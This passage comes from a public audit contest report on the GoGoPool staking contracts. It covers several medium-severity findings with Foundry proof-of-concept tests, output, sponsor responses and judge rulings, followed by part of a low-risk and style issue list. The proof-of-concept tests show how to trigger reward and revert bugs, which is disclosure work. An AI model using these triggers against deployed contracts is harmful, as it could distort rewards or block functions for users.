console.log("LastRewards after syncRewards:", ggAVAX.lastRewardsAmt() / 1 ether);
console.log("Bob maxRedeem():", maxRedeemSharesBob / 1 ether);
// 4.- Redeem function will revert
skip(1 days);
console.log("Bob PreviewRedeem() after skip one day:", ggAVAX.previewRedeem(maxRedeemSharesBob) / 1 ether);
vm.expectRevert(stdError.arithmeticError); // Revert by arithmetic error
// 5.- Redeem will be available after the cycle end.
skip(ggAVAX.rewardsCycleLength() + 1 days);
maxRedeemSharesBob = ggAVAX.maxRedeem(bob);
console.log("TotalReleasedAssets after syncRewards:", ggAVAX.totalReleasedAssets() / 1 ether);
console.log("LastRewards after syncRewards:", ggAVAX.lastRewardsAmt() / 1 ether);
console.log("Bob maxRedeem():", maxRedeemSharesBob / 1 ether);
console.log("Bob PreviewRedeem() after skip to the cycle end:", ggAVAX.previewRedeem(maxRedeemSharesBob) / 1 ether);
[PASS] testRedeemUnderOverFlow() (gas: 1244356)
Rewards amount: 200
TotalReleasedAssets after syncRewards: 1200
LastRewards after syncRewards: 85
Bob maxRedeem(): 1200
Bob PreviewRedeem() after skip one day: 1206
TotalReleasedAssets after syncRewards: 1285
LastRewards after syncRewards: 0
Bob maxRedeem(): 1200
Bob PreviewRedeem() after skip to the cycle end: 1285
Tools used
Recommended Mitigation Steps
Consider redeem the max available amount for the shares owner instead of revert. The maxRedeem()
function amount is not the same as the previewRedeem()
emersoncloud (GoGoPool) acknowledged and commented:
This is a known issue that we don’t intend to fix. The issue is most likely to present itself at the very start of the ggAVAX and not during typical operation. There’s a bit more explanation here: https://github.com/fei-protocol/ERC4626/issues/24
I don’t believe redeeming max available is an appropriate solution because the spec for redeem reads
MUST revert if all of shares cannot be redeemed (due to withdrawal limit being reached, slippage, the owner not having enough shares, etc).
Alex the Entreprenerd (judge) commented:
The Warden has shown a scenario in which
can revert.While this can be attributed to rounding errors, it ultimately is possible for certain depositors to lose marginal amounts of their rewards or principal.
Because of the reduced impact, I agree with Medium Severity.
This is a hedge case that has been argued to have happened very rarely, and for this reason, I maintain that the severity is Medium, but can agree with a nofix, as the worst case will require the Sponsor to offer a small amount of additional token, to allow the last withdrawer to maxRedeem.
[M-19] MinipoolManager: recordStakingError
function does not decrease minipoolCount
leading to too high GGP rewards for staker
Submitted by HollaDieWaldfee, also found by Aymen0909, minhtrng, adriro, sces60107, wagmi, sk8erboy, SmartSek, bin2chen, Allarious, cccz, kaliberpoziomka8552, rvierdiiev, and Saintcode_
The MinipoolManager.recordStakingError
function (https://github.com/code-423n4/2022-12-gogopool/blob/aec9928d8bdce8a5a4efe45f54c39d4fc7313731/contracts/contract/MinipoolManager.sol#L484-L515) does not decrease the minipoolCount
of the staker.
This means that if a staker has a minipool that encounters an error, his minipoolCount
can never go to zero again.
This is bad because the minipoolCount
is used in ClaimNodeOp.calculateAndDistributeRewards
to determine if the rewardsStartTime
of the staker should be reset (https://github.com/code-423n4/2022-12-gogopool/blob/aec9928d8bdce8a5a4efe45f54c39d4fc7313731/contracts/contract/ClaimNodeOp.sol#L81-L84).
Since the minipoolCount
cannot go to zero, the rewardsStartTime
will never be reset.
This means that the staker is immediately eligible for rewards when he creates a minipool again whereas he should have to wait rewardsEligibilityMinSeconds
before he is eligible (which is 14 days at the moment) (https://github.com/code-423n4/2022-12-gogopool/blob/aec9928d8bdce8a5a4efe45f54c39d4fc7313731/contracts/contract/ClaimNodeOp.sol#L51).
To conclude, failing to decrease the minipoolCount
allows the staker to earn higher rewards because he is eligible for staking right after he creates a new minipool and does not have to wait again.
Proof of Concept
I have created the following test that you can add to the MinipoolManager.t.sol
file that logs the minipoolCount
in the Staking
, Error
and Finished
The minipoolCount
is always 1
although it should decrease to 0
when recordStakingError
is called.
function testRecordStakingErrorWrongMinipoolCount() public {
uint256 duration = 2 weeks;
uint256 depositAmt = 1000 ether;
uint256 avaxAssignmentRequest = 1000 ether;
uint256 validationAmt = depositAmt + avaxAssignmentRequest;
uint128 ggpStakeAmt = 200 ether;
ggp.approve(address(staking), MAX_AMT);
MinipoolManager.Minipool memory mp1 = createMinipool(depositAmt, avaxAssignmentRequest, duration);
address liqStaker1 = getActorWithTokens("liqStaker1", MAX_AMT, MAX_AMT);
ggAVAX.depositAVAX{value: MAX_AMT}();
bytes32 txID = keccak256("txid");
minipoolMgr.recordStakingStart(mp1.nodeID, txID, block.timestamp);
bytes32 errorCode = "INVALID_NODEID";
int256 minipoolIndex = minipoolMgr.getIndexOf(mp1.nodeID);
// minipool count when in "Staking" state: 1
minipoolMgr.recordStakingError{value: validationAmt}(mp1.nodeID, errorCode);
// minipool count when in "Error" state: 1
assertEq(vault.balanceOf("MinipoolManager"), depositAmt);
MinipoolManager.Minipool memory mp1Updated = minipoolMgr.getMinipool(minipoolIndex);
MinipoolManager.Minipool memory mp1finished = minipoolMgr.getMinipool(minipoolIndex);
// minipool count when in "Finished" state: 1
Tools Used
Recommended Mitigation Steps
You need to simply add the line staking.decreaseMinipoolCount(owner);
to the MinipoolManager.recordStakingError
Alex the Entreprenerd (judge) commented:
The Warden has shown how, calling
will not decrease theminipoolCount
.This will not only impact view functions but also impact Yield calculations.
For this reason, I agree with Medium Severity.
emersoncloud (GoGoPool) mitigated:
We removed minipool count entirely: multisig-labs/gogopool#42
Status: Mitigation confirmed by RaymondFam and hansfriese.
[M-20] TokenggAVAX: maxDeposit and maxMint return wrong value when contract is paused
Submitted by HollaDieWaldfee, also found by aviggiano
The TokenggAVAX
contract (https://github.com/code-423n4/2022-12-gogopool/blob/aec9928d8bdce8a5a4efe45f54c39d4fc7313731/contracts/contract/tokens/TokenggAVAX.sol#L24) can be paused.
The whenTokenNotPaused
modifier is applied to the following functions (https://github.com/code-423n4/2022-12-gogopool/blob/aec9928d8bdce8a5a4efe45f54c39d4fc7313731/contracts/contract/tokens/TokenggAVAX.sol#L225-L239):
, previewMint
, previewWithdraw
and previewRedeem
Thereby any calls to functions that deposit or withdraw funds revert.
There are two functions (maxWithdraw
and maxRedeem
) that calculate the max amount that can be withdrawn or redeemed respectively.
Both functions return 0
if the TokenggAVAX
contract is paused.
The issue is that TokenggAVAX
does not override the maxDeposit
and maxMint
functions (https://github.com/code-423n4/2022-12-gogopool/blob/aec9928d8bdce8a5a4efe45f54c39d4fc7313731/contracts/contract/tokens/upgradeable/ERC4626Upgradeable.sol#L156-L162) in the ERC4626Upgradable
contract like it does for maxWithdraw
and maxRedeem
Thereby these two functions return a value that cannot actually be deposited or minted.
This can cause any components that rely on any of these functions to return a correct value to malfunction.
So maxDeposit
and maxMint
should return the value 0
when TokenggAVAX
is paused.
Proof of Concept
- The
contract is paused by callingOcyticus.pauseEverything
(https://github.com/code-423n4/2022-12-gogopool/blob/aec9928d8bdce8a5a4efe45f54c39d4fc7313731/contracts/contract/Ocyticus.sol#L37-L43) TokenggAVAX.maxDeposit
(https://github.com/code-423n4/2022-12-gogopool/blob/aec9928d8bdce8a5a4efe45f54c39d4fc7313731/contracts/contract/tokens/upgradeable/ERC4626Upgradeable.sol#L157)- However
cannot be called with this value because it is paused (previewDeposit
reverts because of thewhenTokenNotPaused
modifier) (https://github.com/code-423n4/2022-12-gogopool/blob/aec9928d8bdce8a5a4efe45f54c39d4fc7313731/contracts/contract/tokens/upgradeable/ERC4626Upgradeable.sol#L44)
Tools Used
Recommended Mitigation Steps
The maxDeposit
and maxMint
functions should be overridden by TokenggAVAX
just like maxWithdraw
and maxRedeem
are overridden and return 0
when the contract is paused (https://github.com/code-423n4/2022-12-gogopool/blob/aec9928d8bdce8a5a4efe45f54c39d4fc7313731/contracts/contract/tokens/TokenggAVAX.sol#L206-L223).
So add these two functions to the TokenggAVAX
function maxDeposit(address) public view override returns (uint256) {
if (getBool(keccak256(abi.encodePacked("contract.paused", "TokenggAVAX")))) {
return 0;
return return type(uint256).max;
function maxMint(address) public view override returns (uint256) {
if (getBool(keccak256(abi.encodePacked("contract.paused", "TokenggAVAX")))) {
return 0;
return return type(uint256).max;
Alex the Entreprenerd (judge) commented:
Looks off, the modifiers will revert on pause, not return 0.
0xju1ie (GoGoPool) disagreed with severity and commented:
I’d say Low:
(e.g. assets are not at risk: state handling, function incorrect as to spec, issues with comments). Excludes Gas optimizations, which are submitted and judged separately.
emersoncloud (GoGoPool) commented:
Good catch, I think we should override those for consistency at least but there’s no way to exploit to lose assets. Agreed that QA makes sense.
Alex the Entreprenerd (judge) decreased severity to Low and commented:
By definition, the finding is Informational in Nature.
Because of the relevancy, I’m awarding it QA - Low
Alex the Entreprenerd (judge) increased severity to Medium and commented:
I had a change of heart on this issue, because this pertains to a standard that is being implemented.
For that reason am going to award Medium Severity, because the function breaks the standard, and historically we have awarded similar findings (e..g broken ERC20, broken ERC721 standard), with Medium.
The Warden has shown an inconsistency between the ERC-4626 Spec and the implementation done by the sponsor, while technically this is an informational finding, the fact that a standard was broken warrants a higher severity, leading me to believe that Medium is a more appropriate Severity.
Am making this decision because the Sponsor is following the standard, and the implementation of these functions is not consistent with it.
emersoncloud (GoGoPool) mitigated:
Return correct value from maxMint and maxDeposit when the contract is paused: multisig-labs/gogopool#33
Status: Mitigation confirmed by RaymondFam and hansfriese.
[M-21] Division by zero error can block RewardsPool#startRewardCycle
if all multisig wallet are disabled
Submitted by ladboy233, also found by pauliax, unforgiven, __141345__, peakbolt, and rvierdiiev
A user needs to call the function startRewardsCycle in RewardsPool.sol
/// @notice Public function that will run a GGP rewards cycle if possible
function startRewardsCycle() external {
which calls:
uint256 multisigClaimContractAllotment = getClaimingContractDistribution("ClaimMultisig");
uint256 nopClaimContractAllotment = getClaimingContractDistribution("ClaimNodeOp");
uint256 daoClaimContractAllotment = getClaimingContractDistribution("ClaimProtocolDAO");
if (daoClaimContractAllotment + nopClaimContractAllotment + multisigClaimContractAllotment > getRewardsCycleTotalAmt()) {
revert IncorrectRewardsDistribution();
TokenGGP ggp = TokenGGP(getContractAddress("TokenGGP"));
Vault vault = Vault(getContractAddress("Vault"));
if (daoClaimContractAllotment > 0) {
emit ProtocolDAORewardsTransfered(daoClaimContractAllotment);
vault.transferToken("ClaimProtocolDAO", ggp, daoClaimContractAllotment);
if (multisigClaimContractAllotment > 0) {
emit MultisigRewardsTransfered(multisigClaimContractAllotment);
distributeMultisigAllotment(multisigClaimContractAllotment, vault, ggp);
if (nopClaimContractAllotment > 0) {
emit ClaimNodeOpRewardsTransfered(nopClaimContractAllotment);
ClaimNodeOp nopClaim = ClaimNodeOp(getContractAddress("ClaimNodeOp"));
vault.transferToken("ClaimNodeOp", ggp, nopClaimContractAllotment);
We need to pay special attention to the code block below:
if (multisigClaimContractAllotment > 0) {
emit MultisigRewardsTransfered(multisigClaimContractAllotment);
distributeMultisigAllotment(multisigClaimContractAllotment, vault, ggp);
which calls:
/// @notice Distributes GGP to enabled Multisigs
/// @param allotment Total GGP for Multisigs
/// @param vault Vault contract
/// @param ggp TokenGGP contract
function distributeMultisigAllotment(
uint256 allotment,
Vault vault,
TokenGGP ggp
) internal {
MultisigManager mm = MultisigManager(getContractAddress("MultisigManager"));
uint256 enabledCount;
uint256 count = mm.getCount();
address[] memory enabledMultisigs = new address[](count);
// there should never be more than a few multisigs, so a loop should be fine here
for (uint256 i = 0; i < count; i++) {
(address addr, bool enabled) = mm.getMultisig(i);
if (enabled) {
enabledMultisigs[enabledCount] = addr;
// Dirty hack to cut unused elements off end of return value (from RP)
// solhint-disable-next-line no-inline-assembly
assembly {
mstore(enabledMultisigs, enabledCount)
uint256 tokensPerMultisig = allotment / enabledCount;
for (uint256 i = 0; i < enabledMultisigs.length; i++) {
vault.withdrawToken(enabledMultisigs[i], ggp, tokensPerMultisig);
The code distributes the reward to all multisig evenly.
uint256 tokensPerMultisig = allotment / enabledCount;
However, if the enabledCount is 0, meaning no multisig wallet is enabled, the transactions revert in division by zero error and revert the startRewardsCycle transaction.
As shown in POC.
In RewardsPool.t.sol,
we change the name from testStartRewardsCycle to testStartRewardsCycle_POC
we add the code to disable all multisig wallet. before calling rewardsPool.startRewardsCycle
// disable all multisg wallet
Then we run the test
forge test -vvv --match testStartRewardsCycle_POC
the transaction revert in division by zero error, which block the startRewardsCycle
│ ├─ emit MultisigRewardsTransfered(value: 13499352589262561353689)
│ ├─ [537] Storage::getAddress(0xcda836d09bcf3adcec2f52ddddeceac31738a574d5063511c887064e499593df) [staticcall]
│ │ └─ ← MultisigManager: [0xA12E9172eB5A8B9054F897cC231Cd7a2751D6D93]
│ ├─ [1313] MultisigManager::getCount() [staticcall]
│ │ ├─ [549] Storage::getUint(0x778484468bc504108f077f6bf471293e4138c2d117c6f33607855518cf4bda79) [staticcall]
│ │ │ └─ ← 1
│ │ └─ ← 1
│ ├─ [3050] MultisigManager::getMultisig(0) [staticcall]
│ │ ├─ [537] Storage::getAddress(0xfebe6f39b65f18e050b53df1d0c8d45b8c5cce333324eb048b67b8ee5f26b7a3) [staticcall]
│ │ │ └─ ← RialtoSimulator: [0x98D1613BC08756f51f46E841409E61C32f576F2f]
│ │ ├─ [539] Storage::getBool(0x7ef800e7ca09c0c1063313b56290c06f6bc4bae0e9b7af3899bb7d5ade0403c8) [staticcall]
│ │ │ └─ ← false
│ │ └─ ← RialtoSimulator: [0x98D1613BC08756f51f46E841409E61C32f576F2f], false
│ └─ ← "Division or modulo by 0"
└─ ← "Division or modulo by 0"
Test result: FAILED. 0 passed; 1 failed; finished in 11.64ms
Failing tests:
Encountered 1 failing test in test/unit/RewardsPool.t.sol:RewardsPoolTest
[FAIL. Reason: Division or modulo by 0] testStartRewardsCycle_POC() (gas: 332890)
Recommended Mitigation Steps
We recommend the project handle the case when the number of enabled multisig is 0 gracefully to not block the startRewardCycle transaction.
emersoncloud (GoGoPool) confirmed
Alex the Entreprenerd (judge) commented:
The Warden has shown a scenario that could cause the call to
to revert.When all multisigs are disabled (or no multisig is added), the division by zero will cause reverts.
While Admin Privilege is out of scope for this contest, the Warden has identified how a lack of zero-check can cause an open function to revert.
For this reason, I agree with Medium Severity.
emersoncloud (GoGoPool) mitigated:
Prevents division by zero error blocking startRewardCycle(): multisig-labs/gogopool#37
Status: Mitigation confirmed, but a new medium severity issue was found. Full details in reports from hansfriese and ladboy233. Also included in Mitigation Review section below.
[M-22] Inaccurate estimation of validation rewards from function ExpectedRewardAVA
in MiniPoolManager.sol
Submitted by ladboy233, also found by hansfriese
The validation rewards can be inaccurately displayed to user and the slahsed amount can be wrong when slashing happens.
Proof of Concept
Note the function below:
/// @notice Given a duration and an AVAX amt, calculate how much AVAX should be earned via validation rewards
/// @param duration The length of validation in seconds
/// @param avaxAmt The amount of AVAX the node staked for their validation period
/// @return The approximate rewards the node should recieve from Avalanche for beign a validator
function getExpectedAVAXRewardsAmt(uint256 duration, uint256 avaxAmt) public view returns (uint256) {
ProtocolDAO dao = ProtocolDAO(getContractAddress("ProtocolDAO"));
uint256 rate = dao.getExpectedAVAXRewardsRate();
return (avaxAmt.mulWadDown(rate) * duration) / 365 days;
As outlined in the comment section, the function is intended to calculate how much AVAX should be earned via validation rewards.
Besides displaying the reward, this function is also used in the function slash.
/// @notice Slashes the GPP of the minipool with the given index
/// @dev Extracted this because of "stack too deep" errors.
/// @param index Index of the minipool
function slash(int256 index) private {
address nodeID = getAddress(keccak256(abi.encodePacked("minipool.item", index, ".nodeID")));
address owner = getAddress(keccak256(abi.encodePacked("minipool.item", index, ".owner")));
uint256 duration = getUint(keccak256(abi.encodePacked("minipool.item", index, ".duration")));
uint256 avaxLiquidStakerAmt = getUint(keccak256(abi.encodePacked("minipool.item", index, ".avaxLiquidStakerAmt")));
uint256 expectedAVAXRewardsAmt = getExpectedAVAXRewardsAmt(duration, avaxLiquidStakerAmt);
uint256 slashGGPAmt = calculateGGPSlashAmt(expectedAVAXRewardsAmt);
setUint(keccak256(abi.encodePacked("minipool.item", index, ".ggpSlashAmt")), slashGGPAmt);
emit GGPSlashed(nodeID, slashGGPAmt);
Staking staking = Staking(getContractAddress("Staking"));
staking.slashGGP(owner, slashGGPAmt);
Note the code:
uint256 expectedAVAXRewardsAmt = getExpectedAVAXRewardsAmt(duration, avaxLiquidStakerAmt);
uint256 slashGGPAmt = calculateGGPSlashAmt(expectedAVAXRewardsAmt);
The slashedGGPAmt is calculated based on the AVAX reward amount.
However, the estimation of the validation rewards is not accurate.
According to the doc:
Running a validator and staking with Avalanche provides extremely competitive rewards of between 9.69% and 11.54% depending on the length you stake for.
This implies that the staking length affect staking rewards, but this is kind of vague. What is the exact implementation of the reward calculation?
The implementation is linked below:
// Reward returns the amount of tokens to reward the staker with.
// RemainingSupply = SupplyCap - ExistingSupply
// PortionOfExistingSupply = StakedAmount / ExistingSupply
// PortionOfStakingDuration = StakingDuration / MaximumStakingDuration
// MintingRate = MinMintingRate + MaxSubMinMintingRate * PortionOfStakingDuration
// Reward = RemainingSupply * PortionOfExistingSupply * MintingRate * PortionOfStakingDuration
func (c *calculator) Calculate(stakedDuration time.Duration, stakedAmount, currentSupply uint64) uint64 {
bigStakedDuration := new(big.Int).SetUint64(uint64(stakedDuration))
bigStakedAmount := new(big.Int).SetUint64(stakedAmount)
bigCurrentSupply := new(big.Int).SetUint64(currentSupply)
adjustedConsumptionRateNumerator := new(big.Int).Mul(c.maxSubMinConsumptionRate, bigStakedDuration)
adjustedMinConsumptionRateNumerator := new(big.Int).Mul(c.minConsumptionRate, c.mintingPeriod)
adjustedConsumptionRateNumerator.Add(adjustedConsumptionRateNumerator, adjustedMinConsumptionRateNumerator)
adjustedConsumptionRateDenominator := new(big.Int).Mul(c.mintingPeriod, consumptionRateDenominator)
remainingSupply := c.supplyCap - currentSupply
reward := new(big.Int).SetUint64(remainingSupply)
reward.Mul(reward, adjustedConsumptionRateNumerator)
reward.Mul(reward, bigStakedAmount)
reward.Mul(reward, bigStakedDuration)
reward.Div(reward, adjustedConsumptionRateDenominator)
reward.Div(reward, bigCurrentSupply)
reward.Div(reward, c.mintingPeriod)
if !reward.IsUint64() {
return remainingSupply
finalReward := reward.Uint64()
if finalReward > remainingSupply {
return remainingSupply
return finalReward
Note the reward calculation formula:
// Reward returns the amount of tokens to reward the staker with.
// RemainingSupply = SupplyCap - ExistingSupply
// PortionOfExistingSupply = StakedAmount / ExistingSupply
// PortionOfStakingDuration = StakingDuration / MaximumStakingDuration
// MintingRate = MinMintingRate + MaxSubMinMintingRate * PortionOfStakingDuration
// Reward = RemainingSupply * PortionOfExistingSupply * MintingRate * PortionOfStakingDuration
However, in the current ExpectedRewardAVA, the implementation is just:
AVAX reward rate * avax amount * duration / 365 days.
ProtocolDAO dao = ProtocolDAO(getContractAddress("ProtocolDAO"));
uint256 rate = dao.getExpectedAVAXRewardsRate();
return (avaxAmt.mulWadDown(rate) * duration) / 365 days;
Clearly, the implementation of the avalanche side is more sophisticated and accurate than the implemented ExpectedRewardAVA.
Recommended Mitigation Steps
We recommend the project make the ExpectedRewardAVA implementation match the implement.
Rialto is going to report the correct rewards rate to the DAO from Avalanche. Not sure if it’s a medium.
emersoncloud (GoGoPool) acknowledged and commented:
We felt comfortable with a static setting number because we are (initally) staking minipools for 2 week increments with 2000 AVAX, making the variability in rewards rates minimal.
We will develop a more complex calculation as the protocol starts handling a wider range of funds and durations.
Alex the Entreprenerd (judge) commented:
The Warden has shown an incorrect implementation of the formula to estimate rewards.
The math would cause the slash value to be incorrect, causing improper yield to be distributed, for this reason I agree with Medium Severity.
emersoncloud (GoGoPool) commented:
Acknowledged. See comments above!
Low Risk and Non-Critical Issues
For this contest, 15 reports were submitted by wardens detailing low risk and non-critical issues. The report highlighted below by IllIllI received the top score from the judge.
The following wardens also submitted reports: brgltd, pauliax, lukris02, betweenETHlines, sces60107, AkshaySrivastav, ast3ros, 0xSmartContract, HollaDieWaldfee, cozzetti, Rolezn, codeislight, chaduke, and RaymondFam.
Low Risk Issues
Issue | Instances | |
[L‑01] | Inflation not locked for four years | 1 |
[L‑02] | Contract will stop functioning in the year 2106 | 1 |
[L‑03] | Lower-level initializations should come first | 1 |
[L‑04] | Incorrect percentage conversion | 1 |
[L‑05] | Loss of precision | 2 |
[L‑06] | Signatures vulnerable to malleability attacks | 1 |
[L‑07] | require() should be used instead of assert() |
1 |
Total: 8 instances over 7 issues
Non-critical Issues
Issue | Instances | |
[N‑01] | Common code should be refactored | 1 |
[N‑02] | String constants used in multiple places should be defined as constants | 1 |
[N‑03] | Constants in comparisons should appear on the left side | 1 |
[N‑04] | Inconsistent address separator in storage names | 1 |
[N‑05] | Confusing function name | 1 |
[N‑06] | Misplaced punctuation | 1 |
[N‑07] | Upgradeable contract is missing a __gap[50] storage variable to allow for new storage variables in later versions |
1 |
[N‑08] | Import declarations should import specific identifiers, rather than the whole file | 13 |
[N‑09] | Missing initializer modifier on constructor |
1 |
[N‑10] | The nonReentrant modifier should occur before all other modifiers |
2 |
[N‑11] | override function arguments that are unused should have the variable name removed or commented out to avoid compiler warnings |
1 |
[N‑12] | constant s should be defined rather than using magic numbers |
2 |
[N‑13] | Missing event and or timelock for critical parameter change | 1 |
[N‑14] | Events that mark critical parameter changes should contain both the old and the new value | 2 |
[N‑15] | Use a more recent version of solidity | 1 |
[N‑16] | Use a more recent version of solidity | 1 |
[N‑17] | Constant redefined elsewhere | 2 |
[N‑18] | Lines are too long | 1 |
[N‑19] | Variable names that consist of all capital letters should be reserved for constant /immutable variables |
2 |
[N‑20] | Using > />= without specifying an upper bound is unsafe |
2 |
[N‑21] | Typos | 3 |
[N‑22] | File is missing NatSpec | 3 |
[N‑23] | NatSpec is incomplete | 27 |
[N‑24] | Not using the named return variables anywhere in the function is confusing | 1 |
[N‑25] | Contracts should have full test coverage | 1 |
[N‑26] | Large or complicated code bases should implement fuzzing tests | 1 |
[N‑27] | Function ordering does not follow the Solidity style guide | 15 |
[N‑28] | Contract does not follow the Solidity style guide’s suggested layout ordering | 9 |
[N‑29] | Open TODOs | 1 |
Total: 99 instances over 29 issues
[L‑01] Inflation not locked for four years
The litepaper says that there will be no inflation for four years, but there is no code enforcing this.
There is 1 instance of this issue:
File: /contracts/contract/ProtocolDAO.sol
39 // GGP Inflation
40 setUint(keccak256("ProtocolDAO.InflationIntervalSeconds"), 1 days);
41: setUint(keccak256("ProtocolDAO.InflationIntervalRate"), 1000133680617113500); // 5% annual calculated on a daily interval - Calculate in js example: let dailyInflation = web3.utils.toBN((1 + 0.05) ** (1 / (365)) * 1e18);
[L‑02] Contract will stop functioning in the year 2106
Limiting the timestamp to fit in a uint32
will cause the call below to start reverting in 2106.
There is 1 instance of this issue:
File: /contracts/contract/tokens/TokenggAVAX.sol
89: uint32 timestamp = block.timestamp.safeCastTo32();
[L‑03] Lower-level initializations should come first
There may not be an issue now, but if ERC4626
changes to rely on some of the functions BaseUpgradeable
provides, things will break.
There is 1 instance of this issue:
File: /contracts/contract/tokens/TokenggAVAX.sol
72 function initialize(Storage storageAddress, ERC20 asset) public initializer {
73 __ERC4626Upgradeable_init(asset, "GoGoPool Liquid Staking Token", "ggAVAX");
74: __BaseUpgradeable_init(storageAddress);
[L‑04] Incorrect percentage conversion
0.2 ether should be 20%, not 2%. Other areas use 0.X as X0%.
There is 1 instance of this issue:
File: /contracts/contract/MinipoolManager.sol
194: /// @param delegationFee Percentage delegation fee in units of ether (2% is 0.2 ether)
[L‑05] Loss of precision
Division by large numbers may result in the result being zero, due to solidity not supporting fractions. Consider requiring a minimum amount for the numerator to ensure that it is always larger than the denominator.
There are 2 instances of this issue:
File: contracts/contract/RewardsPool.sol
60: return (block.timestamp - startTime) / dao.getInflationIntervalSeconds();
128: return (block.timestamp - startTime) / dao.getRewardsCycleSeconds();
[L‑06] Signatures vulnerable to malleability attacks
accepts as valid, two versions of signatures, meaning an attacker can use the same signature twice. Consider adding checks for signature malleability, or using OpenZeppelin’s ECDSA
library to perform the extra checks necessary in order to prevent this attack.
There is 1 instance of this issue:
File: contracts/contract/tokens/upgradeable/ERC20Upgradeable.sol
132 address recoveredAddress = ecrecover(
133 keccak256(
134 abi.encodePacked(
135 "\x19\x01",
137 keccak256(
138 abi.encode(
139 keccak256("Permit(address owner,address spender,uint256 value,uint256 nonce,uint256 deadline)"),
140 owner,
141 spender,
142 value,
143 nonces[owner]++,
144 deadline
145 )
146 )
147 )
148 ),
149 v,
150 r,
151 s
152: );
[L‑07] require()
should be used instead of assert()
Prior to solidity version 0.8.0, hitting an assert consumes the remainder of the transaction’s available gas rather than returning it, as require()
do. assert()
should be avoided even past solidity version 0.8.0 as its documentation states that “The assert function creates an error of type Panic(uint256). … Properly functioning code should never create a Panic, not even on invalid external input. If this happens, then there is a bug in your contract which you should fix”.
There is 1 instance of this issue:
File: contracts/contract/tokens/TokenggAVAX.sol
83: assert(msg.sender == address(asset));
[N‑01] Common code should be refactored
BaseAbstract performs similar operations, so the common code should be refactored to a function
There is 1 instance of this issue:
File: /contracts/contract/MultisigManager.sol
110: addr = getAddress(keccak256(abi.encodePacked("multisig.item", index, ".address")));
[N‑02] String constants used in multiple places should be defined as constants
There is 1 instance of this issue:
File: /contracts/contract/MultisigManager.sol
110: addr = getAddress(keccak256(abi.encodePacked("multisig.item", index, ".address")));
[N‑03] Constants in comparisons should appear on the left side
Doing so will prevent typo bugs.
There is 1 instance of this issue:
File: /contracts/contract/ClaimNodeOp.sol
92: if (ggpRewards == 0) {
[N‑04] Inconsistent address separator in storage names
Most addresses in storage names don’t separate the prefix from the address with a period, but this one has one.
There is 1 instance of this issue:
File: /contracts/contract/ProtocolDAO.sol
102 function getClaimingContractPct(string memory claimingContract) public view returns (uint256) {
103 return getUint(keccak256(abi.encodePacked("ProtocolDAO.ClaimingContractPct.", claimingContract)));
104 }
106 /// @notice Set the percentage a contract is owed for a rewards cycle
107 function setClaimingContractPct(string memory claimingContract, uint256 decimal) public onlyGuardian valueNotGreaterThanOne(decimal) {
108 setUint(keccak256(abi.encodePacked("ProtocolDAO.ClaimingContractPct.", claimingContract)), decimal);
109: }
[N‑05] Confusing function name
Consider changing the name to stakeGGPAs
or stakeGGPFor
There is 1 instance of this issue:
File: /contracts/contract/Staking.sol
328: function restakeGGP(address stakerAddr, uint256 amount) public onlySpecificRegisteredContract("ClaimNodeOp", msg.sender) {
[N‑06] Misplaced punctuation
There’s an extra comma - it looks like a find-and-replace error.
There is 1 instance of this issue:
File: /contracts/contract/Vault.sol
154 // Update balances
155 tokenBalances[contractKey] = tokenBalances[contractKey] - amount;
156 // Get the toke ERC20 instance
157 ERC20 tokenContract = ERC20(tokenAddress);
158 // Withdraw to the withdrawal address, , safeTransfer will revert if it fails
159 tokenContract.safeTransfer(withdrawalAddress, amount);
160: }
[N‑07] Upgradeable contract is missing a __gap[50]
storage variable to allow for new storage variables in later versions
See this link for a description of this storage variable. While some contracts may not currently be sub-classed, adding the variable now protects against forgetting to add it in the future.
There is 1 instance of this issue:
File: contracts/contract/tokens/TokenggAVAX.sol
24: contract TokenggAVAX is Initializable, ERC4626Upgradeable, UUPSUpgradeable, BaseUpgradeable {
[N‑08] Import declarations should import specific identifiers, rather than the whole file
Using import declarations of the form import {<identifier_name>} from "some/file.sol"
avoids polluting the symbol namespace making flattened files smaller, and speeds up compilation.
There are 13 instances of this issue. (For in-depth details on this and all further issues with multiple instances, please see the warden’s full report.)
[N‑09] Missing initializer
modifier on constructor
OpenZeppelin recommends that the initializer
modifier be applied to constructors in order to avoid potential griefs, social engineering, or exploits. Ensure that the modifier is applied to the implementation contract. If the default constructor is currently being used, it should be changed to be an explicit one with the modifier applied.
There is 1 instance of this issue:
File: contracts/contract/BaseUpgradeable.sol
9: contract BaseUpgradeable is Initializable, BaseAbstract {
[N‑10] The nonReentrant
should occur before all other modifiers
This is a best-practice to protect against reentrancy in other modifiers.
There are 2 instances of this issue.
[N‑11] override
function arguments that are unused should have the variable name removed or commented out to avoid compiler warnings
There is 1 instance of this issue:
File: contracts/contract/tokens/TokenggAVAX.sol
255: function _authorizeUpgrade(address newImplementation) internal override onlyGuardian {}
[N‑12] constant
s should be defined rather than using magic numbers
Even assembly can benefit from using readable constants instead of hex/numeric literals.
There are 2 instances of this issue.
[N‑13] Missing event and or timelock for critical parameter change
Events help non-contract tools to track changes, and events prevent users from being surprised by changes.
There is 1 instance of this issue:
File: contracts/contract/Storage.sol
41 function setGuardian(address newAddress) external {
42 // Check tx comes from current guardian
43 if (msg.sender != guardian) {
44 revert MustBeGuardian();
45 }
46 // Store new address awaiting confirmation
47 newGuardian = newAddress;
48: }
[N‑14] Events that mark critical parameter changes should contain both the old and the new value
This should especially be done if the new value is not required to be different from the old value.
There are 2 instances of this issue.
[N‑15] Use a more recent version of solidity
Use a solidity version of at least 0.8.13 to get the ability to use using for
with a list of free functions.
There is 1 instance of this issue:
File: contracts/contract/tokens/upgradeable/ERC4626Upgradeable.sol
2: pragma solidity >=0.8.0;
[N‑16] Use a more recent version of solidity
- Use a solidity version of at least 0.8.4 to get
instead ofabi.encodePacked(<bytes>,<bytes>)
. - Use a solidity version of at least 0.8.12 to get
instead ofabi.encodePacked(<str>,<str>)
There is 1 instance of this issue:
File: contracts/contract/tokens/upgradeable/ERC20Upgradeable.sol
2: pragma solidity >=0.8.0;
[N‑17] Constant redefined elsewhere
Consider defining in only one contract so that values cannot become out of sync when only one location is updated. A cheap way to store constants in a single location is to create an internal constant
in a library
. If the variable is a local cache of another contract’s value, consider making the cache variable internal or private, which will require external users to query the contract with the source of truth, so that callers don’t get out of sync.
There are 2 instances of this issue.
[N‑18] Lines are too long
Usually lines in source code are limited to 80 characters. Today’s screens are much larger so it’s reasonable to stretch this in some cases. Since the files will most likely reside in GitHub, and GitHub starts using a scroll bar in all cases when the length is over 164 characters, the lines below should be split when they reach that length
There is 1 instance of this issue:
File: contracts/contract/ProtocolDAO.sol
